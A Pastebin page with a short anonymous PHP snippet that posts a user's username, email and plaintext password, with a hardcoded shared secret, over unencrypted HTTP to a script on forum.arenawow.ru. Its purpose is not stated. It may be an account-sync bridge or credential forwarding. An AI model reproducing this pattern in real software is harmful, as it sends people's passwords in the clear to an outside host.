Advertisement
Guest User

Untitled

a guest
Jan 22nd, 2019
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.68 KB | None | 0 0
  1. $secret_script = 'vwevqiwubevoqwyev12930vsfdefr341273vwoievbqwoeivgdfgdyeiVBYWOVEQOPB';
  2.  
  3.  
  4. $postdata = http_build_query(
  5. array(
  6. 'secret' => $secret_script,
  7. 'username' => $data['username'],
  8. 'email' => $data['email'],
  9. 'password' => $passwords['password'],
  10. )
  11. );
  12.  
  13. $opts = array('http' =>
  14. array(
  15. 'method' => 'POST',
  16. 'header' => 'Content-type: application/x-www-form-urlencoded',
  17. 'content' => $postdata
  18. )
  19. );
  20.  
  21. $context = stream_context_create($opts);
  22.  
  23. $result = file_get_contents('http://forum.arenawow.ru/VLqecrergdvveqwebuqp.php', false, $context);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement